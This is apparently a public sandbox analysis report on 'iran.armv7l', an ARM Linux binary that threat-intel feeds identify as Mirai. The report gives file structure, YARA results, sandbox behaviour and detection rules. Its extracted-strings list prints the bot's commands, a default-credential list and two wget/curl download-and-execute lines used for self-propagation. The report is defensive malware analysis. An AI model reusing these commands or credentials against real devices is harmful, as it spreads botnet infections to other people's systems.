Malwagon
ARMV
iran.armv7l File Analysis · submitted Sep 7, 2026 21:43 · 142.8 KB
1proc 5IOCs
Malicious80 Linux Completed Public
Get sample Report Sign in

Malicious

80/100

10 points past the malicious line at 70.

Clean0-34 Suspicious35-69 Malicious70-100

Why this verdict

+80
Threat intelligence
  • MalwareBazaar known sample: Mirai
  • Known malicious hash (feed): urlhaus: malware payload (elf)

Analysis layers

Static ran no points
Dynamic ran no points
Threat intel ran moved the score
AI ran no points

Sample

TypeFile Linux
MIMEapplication/x-executable

Run conditions

Sandbox OSUbuntu 24.04 (Linux sandbox)
InternetIsolated

Malware family

0 independent sources
malware payload (elf) possible

Named by a single source. Treat it as a lead rather than a classification.

LayerSourceWhat it matched
hash_feed rule corpus urlhaus: malware payload (elf)
Also named, less strongly: Torii possible

Detection signatures

1 detected
Severity Detection Evidence Layer
MED
Exfiltration / C2 endpoint strings
MITRE T1041
string user-agent: matched string
static

Structure

What the file is made of: headers, imports, how it was built and whether it was signed.

Signature
Unknown
No compiler or packer signature matched this file.
Not packed
Identity
File
typeELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV)
size142.8 KB
entropy6.1097
Packing
Not packed
The file's code is readable on disk - nothing is compressed or encrypted around it.
0/100
packer confidence
Static analysis reads this file directly Nothing is hiding the code from a static pass, so what the file contains is what the report shows.
Indicators weighed

Packer detection looks at a program's entry point, sections and entropy. This file is not a program image, so there was nothing of that kind to assess.

Secrets & malicious strings

1 flagged string

Flagged string categories

exfiltration / C2 med 1 hit
IndicatorFound inEvidence from the sample
user-agent: extracted string User-Agent: %s

ELF header

arm · 32-bit
TypeET_EXEC
Machinearm (little-endian)
Entry point0x8194
Interpreternone (static)
Linkage static stripped
Hardening exec stack

ELF sections

19 total
NameTypeSizeFlagsEntropy
-SHT_NULL0.0 B -
.initSHT_PROGBITS16.0 B ALLOCEXECINSTR
3.75
.textSHT_PROGBITS131.6 KB ALLOCEXECINSTR
6.0332
.finiSHT_PROGBITS16.0 B ALLOCEXECINSTR
3.75
.rodataSHT_PROGBITS8.7 KB ALLOC
5.2486
.ARM.extabSHT_PROGBITS24.0 B ALLOC
3.0016
.ARM.exidxSHT_ARM_EXIDX416.0 B ALLOC
4.7554
.eh_frameSHT_PROGBITS4.0 B WRITEALLOC -
.tdataSHT_PROGBITS4.0 B WRITEALLOC
2.0
.tbssSHT_NOBITS8.0 B WRITEALLOC -
.init_arraySHT_INIT_ARRAY4.0 B WRITEALLOC
1.5
.fini_arraySHT_FINI_ARRAY4.0 B WRITEALLOC
1.5
.jcrSHT_PROGBITS4.0 B WRITEALLOC -
.data.rel.roSHT_PROGBITS24.0 B WRITEALLOC
1.6683
.gotSHT_PROGBITS208.0 B WRITEALLOC
3.9467
.dataSHT_PROGBITS768.0 B WRITEALLOC
4.0699
.bssSHT_NOBITS1.0 MB WRITEALLOC -
.ARM.attributesSHT_ARM_ATTRIBUTES22.0 B
3.2591
.shstrtabSHT_STRTAB156.0 B
4.0767

Needed libraries

0

No dynamic dependencies (static binary).

Imported symbols

0
-

Threat classification

YARA family candidates
FamilyAgreeing rulesMatched rulesDisposition
Torii1ELF_Toriilike_persist Not a classification: one rule cannot establish a family, so this named nothing and scored nothing.

YARA matches

1 finding · 0 scored
Rule What it matched Corpus Weight
ELF_Toriilike_persist
rule dated 2025-12-25
Detects Torii IoT Botnet (stealthier Mirai alternative)
2 of 4 strings matched
$elf_header \x7fELF at 0x0
$unique_seed npxXoudifFeEgGaACScs at 0x2208c
Tier 1 - curated family set
licence-gated and benign-tested; may name a malware family
SCORED 0
Scored 0: the rule declares no category. Only anti-vm, anti-debug, dropper and packer matches carry weight.
Names Torii, but one rule cannot establish a family: two independent rules must agree, so this named nothing.

None of the rules above moved the score. The score model reads four rule categories - anti-vm, anti-debug, dropper and packer - and a rule outside them can match, and be worth reading, without being evidence the verdict is built on.

Extracted strings

showing 200 of 283
  • /proc
  • /proc/%s/comm
  • /etc/init.d
  • /etc/init.d/xs.main
  • %s %s
  • /etc/rc.local
  • Host: %s
  • User-Agent: %s
  • Connection: keep-alive
  • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110
  • POST / HTTP/1.1
  • Content-Type: application/x-www-form-urlencoded
  • Content-Length: 16
  • data=random_data
  • HEAD / HTTP/1.1
  • /proc/%s/cmdline
  • wget
  • /proc/%d/comm
  • /proc/%d/stat
  • %*d %*s %*c %d
  • s6-supervise
  • /proc/%s/stat
  • /proc/%s/exe
  • /proc/%s/status
  • /proc/%s/fd/0
  • %llx
  • (deleted)
  • /proc/%d/task/%d/children
  • s6-linux-init
  • init
  • systemd
  • supervisord
  • cron
  • daemon
  • dbus
  • login
  • sshd
  • shell
  • bash
  • curl
  • ftpget
  • /usr/bin/
  • /usr/sbin/
  • /usr/local/bin/
  • /usr/local/sbin/
  • /usr/lib/
  • /usr/lib64/
  • /var/lib/
  • /usr/share/
  • /fhrom/
  • /fhrom/fhshell/
  • /fhrom/bin/
  • /proc/self/exe
  • /init
  • /sbin/init
  • /package/admin/
  • /package/
  • /command/
  • /dev/watchdog
  • /dev/misc/watchdog
  • /usr/bin/watchdogd
  • /usr/sbin/watchdog
  • /bin/sw_watchdog
  • /dev/watchdog0
  • /dev/watchdog1
  • Not a mirai at all
  • Death to israel
  • armv7l
  • stop
  • ping
  • pong %s
  • !selfrep telnet
  • !selfrep realtek
  • !openshell
  • !shellcmd
  • %s 2>&1
  • !update
  • icmp
  • psize=
  • httpmode=
  • gport=
  • gre_proto=
  • usleep=
  • port=
  • udpplain
  • !kill
  • default
  • %u.%d.%d.%d
  • orf; cd /tmp; /bin/busybox wget http://%s/mipsel; chmod 777 mipsel; ./mipsel selfrep.realtek; /bin/busybox wget http://%s/mips; chmod 777 mips; ./mips selfrep.realtek
  • [0mPassword:
  • [0mAccess granted!
  • [0mNo shell available
  • [0mWrong password!
  • --noprofile
  • --norc
  • /bin/bash
  • /bin/sh
  • cd /tmp || cd /var || cd /dev/shm;wget http://%s/telnet.sh; curl -O http://%s/telnet.sh; chmod 777 telnet.sh; sh telnet.sh;
  • root
  • user
  • postgres
  • admin
  • password
  • anko
  • dreambox
  • Login:
  • login:
  • username:
  • Username:
  • Password:
  • password:
  • GET /%s HTTP/1.0
  • Connection: close
  • %s/%s
  • /proc/self/cmdline
  • exit 0
  • FATAL: exception not rethrown
  • (null)
  • Unknown error
  • Success
  • Operation not permitted
  • No such file or directory
  • No such process
  • Interrupted system call
  • Input/output error
  • No such device or address
  • Argument list too long
  • Exec format error
  • Bad file descriptor
  • No child processes
  • Resource temporarily unavailable
  • Cannot allocate memory
  • Permission denied
  • Bad address
  • Block device required
  • Device or resource busy
  • File exists
  • Invalid cross-device link
  • No such device
  • Not a directory
  • Is a directory
  • Invalid argument
  • Too many open files in system
  • Too many open files
  • Inappropriate ioctl for device
  • Text file busy
  • File too large
  • No space left on device
  • Illegal seek
  • Read-only file system
  • Too many links
  • Broken pipe
  • Numerical argument out of domain
  • Numerical result out of range
  • Resource deadlock avoided
  • File name too long
  • No locks available
  • Function not implemented
  • Directory not empty
  • Too many levels of symbolic links
  • No message of desired type
  • Identifier removed
  • Channel number out of range
  • Level 2 not synchronized
  • Level 3 halted
  • Level 3 reset
  • Link number out of range
  • Protocol driver not attached
  • No CSI structure available
  • Level 2 halted
  • Invalid exchange
  • Invalid request descriptor
  • Exchange full
  • No anode
  • Invalid request code
  • Invalid slot
  • Bad font file format
  • Device not a stream
  • No data available
  • Timer expired
  • Out of streams resources
  • Machine is not on the network
  • Package not installed
  • Object is remote
  • Link has been severed
  • Advertise error
  • Srmount error
  • Communication error on send
  • Protocol error
  • Multihop attempted
  • RFS specific error
  • Bad message
  • Value too large for defined data type
  • Name not unique on network
  • File descriptor in bad state
  • Remote address changed
  • Can not access a needed shared library
  • Accessing a corrupted shared library
  • .lib section in a.out corrupted
  • Attempting to link in too many shared libraries

Stack and decoded strings were not recovered: string emulation failed on this file. Only literal strings present in the file are listed above.

VM console

headless guest

The Linux sandbox runs a server image with no desktop, so there is no screen to record - this is the boot console, kept because a kernel panic or an out-of-memory kill would show up here and in no other layer. What the sample did is under Behavior, File & registry and Network, captured from the syscall trace rather than from pixels.

VM console

Behavior summary

1 process(es) observed

Launched/var/tmp/iran.armv7l
Execution::Command and Scripting Interpreter [T1059]

MITRE ATT&CK

1 technique
Execution
Command and Scripting Interpreter
T1059

Syscall summary

top calls
execve1

Persistence & evasion

No persistence or evasion behavior observed.

No network activity - the run was isolated

This detonation was given no internet connection, so a sample that wanted to reach out could not. An empty section here says nothing about whether it tried.

Process tree

What ran during the detonation, and what each process did. Select a node to see the activity attributed to it.

1process

iran.armv7l

1 process
1 process

Attributed activity

0Mechanisms found
90Methods checked
0ATT&CK techniques
NONEHighest severity

Established mechanisms

clean

No persistence established

None of the 90 auto-start methods below were established during this run.

Detection coverage

0 / 90

Every auto-start method checked on this sample, grouped by family. A method with no result is reported clean.

Logon & Startup 22 clean
  • Active Setup Installed Component T1547.014 clean
  • Explorer Delay-Load Object T1547.001 clean
  • Explorer Run Key T1547.001 clean
  • Explorer SharedTaskScheduler T1547.001 clean
  • Group Policy Extension DLL T1547.004 clean
  • Group Policy Run Key T1547.001 clean
  • Logon Script T1037.001 clean
  • RDP WDS Startup Program T1547.001 clean
  • Registry Run Key T1547.001 clean
  • Registry RunEx Key T1547.001 clean
  • Registry RunOnce Key T1547.001 clean
  • Registry RunOnceEx Key T1547.001 clean
  • Registry RunServices Key T1547.001 clean
  • Startup Folder Item T1547.001 clean
  • Startup Folder Redirection T1547.001 clean
  • Terminal Services Initial Program T1547.001 clean
  • Winlogon GINA DLL T1547.004 clean
  • Winlogon MPNotify Value T1547.004 clean
  • Winlogon Notify Package T1547.004 clean
  • Winlogon Shell Value T1547.004 clean
  • Winlogon Taskman Value T1547.004 clean
  • Winlogon Userinit Value T1547.004 clean
Services & Tasks 9 clean
  • BITS Job T1197 clean
  • Print Monitor DLL T1547.010 clean
  • Print Processor DLL T1547.012 clean
  • Scheduled Task T1053.005 clean
  • Scheduled Task Registry Implant T1053.005 clean
  • Service Control Manager Security Descriptor T1574.011 clean
  • Service DLL Hijack T1543.003 clean
  • Time Provider DLL T1547.003 clean
  • Windows Service Creation T1543.003 clean
Execution Hijack 17 clean
  • .NET Managed Debugger T1546.012 clean
  • Accessibility Tool Hijack T1546.008 clean
  • AeDebug Postmortem Debugger T1546.012 clean
  • App Paths Hijack T1546.012 clean
  • Application Shim Database T1546.011 clean
  • Boot Verification Program T1547.002 clean
  • Command Processor AutoRun T1546.011 clean
  • Explorer Load Value T1547.001 clean
  • Explorer MyComputer Tool Hijack T1546.001 clean
  • Registry Image File Execution Options T1546.012 clean
  • Screensaver Hijack T1546.002 clean
  • Setup ErrorHandler Script T1546 clean
  • Shell Open Command Hijack T1546.001 clean
  • SilentProcessExit Monitor T1546.012 clean
  • Telemetry Controller Command T1546.015 clean
  • WER ReflectDebugger T1546.012 clean
  • Windows Error Reporting Debugger T1546.012 clean
DLL Load Order 12 clean
  • .NET CLR Profiler DLL T1574.012 clean
  • .NET Startup Hook DLL T1574 clean
  • AppCert DLLs T1546.009 clean
  • AppInit DLLs T1546.010 clean
  • AutodialDLL Winsock Injection T1546.006 clean
  • DLL Search-Order Hijack T1574.001 T1574.002 clean
  • DNS Server Plugin DLL T1574.001 clean
  • HTML Help Helper DLL T1546 clean
  • KnownDLLs Manipulation T1574.001 clean
  • Natural Language Platform DLL Override T1546 clean
  • Netsh Helper DLL T1546.007 clean
  • Winsock Layered Service Provider T1546.006 clean
COM & Browser 6 clean
  • Browser Extension T1176 clean
  • Browser Helper Object T1176 clean
  • COM Server Hijack T1546.015 clean
  • HTML Help COM Object Hijack T1546.015 clean
  • Shell Context Menu Handler T1546.001 clean
  • Shell Extension Handler T1546.001 clean
Security Providers & Accounts 11 clean
  • Account RID Hijack T1098 clean
  • AMSI Provider T1562.001 clean
  • Credential Provider T1547.014 clean
  • DSRM Admin Logon Backdoor T1556 clean
  • Hidden Local Account T1136.001 clean
  • LSA Authentication Package T1547.002 clean
  • LSA Extension DLL T1547.005 clean
  • LSA Notification Package T1547.005 clean
  • LSA Security Package T1547.005 clean
  • Network Provider DLL T1556.008 clean
  • Security Support Provider T1547.005 clean
Scripting & Applications 9 clean
  • Netsh Port Proxy T1090.001 clean
  • Office Add-in T1137.006 clean
  • Office Executable Sideload T1574.002 clean
  • Office Startup Template T1137.001 clean
  • Office Test Key T1137.002 clean
  • Power Automate Flow T1546 clean
  • PowerShell Profile T1546.013 clean
  • Windows Terminal Startup Action T1546 clean
  • WMI Event Subscription T1546.003 clean
Boot & Firmware 4 clean
  • BootExecute Native Image T1547.002 clean
  • PlatformExecute Native Image T1547.002 clean
  • SetupExecute Native Image T1547.002 clean
  • UEFI / Bootkit Artifact T1542.003 T1542.001 clean

File activity summary

create 0 write 0 modify 0 delete 0 rename 0

File & registry ops

0 file · 0 registry · sample scope
OperationTargetProcess

No file or registry operations captured.

3 reported a hit 17 answered no 1 could not answer 2 had nothing to check
3Sources with a hit
21Sources queriedof 23 available
486.1kFeed records
1Could not answer

File reputation

2 of 7 listed
SourceChecksResultDetailFeed
MalwareBazaar File hash Mirai elf live lookup
URLhaus payload hashes File hash listed urlhaus: Mirai 1,474 records
5 minutes ago
VirusTotal File hash cannot access rate limited (free-tier quota) live lookup
filescan.io File hash no detections - live lookup
MalwareBazaar hash feed File hash clean not in feed 2,535 records
6 minutes ago
MalwareBazaar ransomware feed File hash clean not in feed 8,271 records
4 hours ago
ThreatFox hash IOCs File hash clean not in feed 1,632 records
6 minutes ago

Hash lookups only - the sample itself is never uploaded to any third party.

Network indicators

8 clear
SourceChecksResultDetailFeed
blocklist.de IP / domain / URL clean 3 observed indicators, none listed 24.5k records
6 minutes ago
CINS Army IP / domain / URL clean 3 observed indicators, none listed 15k records
6 minutes ago
Emerging Threats IP / domain / URL clean 3 observed indicators, none listed 580 records
6 minutes ago
Feodo Tracker IP / domain / URL clean 3 observed indicators, none listed 5 records
6 minutes ago
IPsum IP / domain / URL clean 3 observed indicators, none listed 17.7k records
6 minutes ago
Phishing.Database IP / domain / URL clean 3 observed indicators, none listed 391.1k records
4 hours ago
ThreatFox IP / domain / URL clean 3 observed indicators, none listed 1,632 records
6 minutes ago
URLhaus IP / domain / URL clean 3 observed indicators, none listed 5,155 records
6 minutes ago

TLS fingerprints

0 clear
SourceChecksResultDetailFeed
abuse.ch JA3 blocklist JA3 / JA4 not checked no TLS client fingerprint observed 97 records
16 hours ago
SSL blocklist JA3 / JA4 not checked no TLS client fingerprint observed 10.7k records
6 minutes ago

Detection rules

1 of 2 listed
SourceChecksResultDetailFeed
YARA rules Sample content 1 match ELF_Toriilike_persist 110 records
6 minutes ago
Sigma rules Behavior log clean - 2,275 records
22 hours ago

Tooling catalogs

4 clear
SourceChecksResultDetailFeed
LOLBAS Process image paths clean 1 process image path, none masqueraded 244 records
6 minutes ago
LOLBootloaders File hash clean not a known vulnerable bootloader 520 records
5 minutes ago
LOLDrivers File hash clean not a known vulnerable driver 2,306 records
6 minutes ago
LOLRMM Names and domains clean 2 name/domain indicators checked, no remote-management tooling 322 records
5 minutes ago

Analyst narrative

The analysis of the sample indicates that it was executed successfully in the sandbox environment. **Initial Access:** There is no direct evidence of initial access mechanisms such as exploitation or phishing, as the sample appears to be executed directly. **Execution:** The sample executed a process named `iran.armv7l` with the command line `/var/tmp/iran.armv7l`, which indicates that it utilized the command and scripting interpreter for execution, aligning with MITRE technique T1059. **Persistence:** No persistence mechanisms were observed during the execution of the sample. There were no indications of registry modifications or file drops that would suggest the sample attempted to maintain a presence on the system. **Defense Evasion:** There are no specific defense evasion techniques noted in the behavior summary. The sample did not exhibit any behaviors that would indicate attempts to evade detection. **Command and Control (C2):** The analysis did not reveal any active network connections or communications with external servers. However, there are indicators of potential C2 URLs (e.g., `hxxp://%s/mipsel;`, `hxxp://%s/mips;`, `hxxp://%s/telnet.sh;`) that suggest the sample may have intended to connect to remote resources, although no actual connections were made during the analysis. **Impact:** The impact of the sample is unclear due to the lack of observable malicious behavior beyond the execution of the process. There were no file operations, dropped files, or network activity that would indicate harmful effects on the system. **Verdict Rationale:** The sample executed successfully, but the lack of persistence, defense evasion, and observable impact limits the conclusions that can be drawn regarding its overall malicious intent. The presence of potential C2 URLs suggests further investigation may be warranted, but the execution alone does not provide sufficient evidence to classify the sample as definitively malicious.

Evasion analysis

No evasive checkpoints detected.

2 malicious 0 suspicious 3 info
Attribution:Mirai

Network indicators

3
SeverityTypeIndicatorDescription
info url http://%s/mipsel; Extracted from the sample's strings
info url http://%s/mips; Extracted from the sample's strings
info url http://%s/telnet.sh; Extracted from the sample's strings

File indicators

2
SeverityTypeIndicatorDescription
malicious sample_sha256 699848a33a1808fe612ce4e2e1f1bb292546509b3939c56b6842e315ad02d731 Submitted sample (SHA256)
malicious sample_md5 c16b9c0f10125b96a0236f1f0dcc6dc8 Submitted sample (MD5)

MITRE ATT&CK

1 technique
Execution
Command and Scripting Interpreter
T1059

Sigma detections

0 matches of 2275 rules

The Sigma corpus was evaluated against this run's processes, registry, file, network, DNS and script activity. Nothing matched.

Generated rules

Suricata/Snort: auto_file_2378_suricata

Auto-generated
alert http any any -> any any (msg:"sandbox auto scan 2378 C2 URL"; http.uri; content:"/mipsel\;"; sid:15976960; rev:1;)
alert http any any -> any any (msg:"sandbox auto scan 2378 C2 URL"; http.uri; content:"/mips\;"; sid:15976961; rev:1;)
alert http any any -> any any (msg:"sandbox auto scan 2378 C2 URL"; http.uri; content:"/telnet.sh\;"; sid:15976962; rev:1;)

Extracted files

What came out of the sample: unpacked payloads, carved objects and captured memory. Each one is stored by content hash, so the same object extracted twice is the same row.

No extracted files

Nothing was unpacked or carved out of this sample. Packed samples, documents with embedded objects and installers are the ones that usually produce artifacts here.

Export & download

/s/2378

The report downloads - PCAP and the SIEM/TIP exports - are a paid-plan feature. Sign in with a paid plan to export this report.

AI analysis report

An enterprise report with an AI-written executive summary, threat assessment, kill chain, and recommendations, plus the derived evidence (verdict, MITRE ATT&CK, network, file modifications, dropped files, IOCs) and screenshots. The AI narrative is built from derived analysis data only, so the raw sample never leaves the host (no-upload and AI-boundary preserved).

Public analyses of this file

1 run
SubmittedEnvironmentVerdictScore
2026-09-07 21:43 Shown below Static analysis Malicious 80/100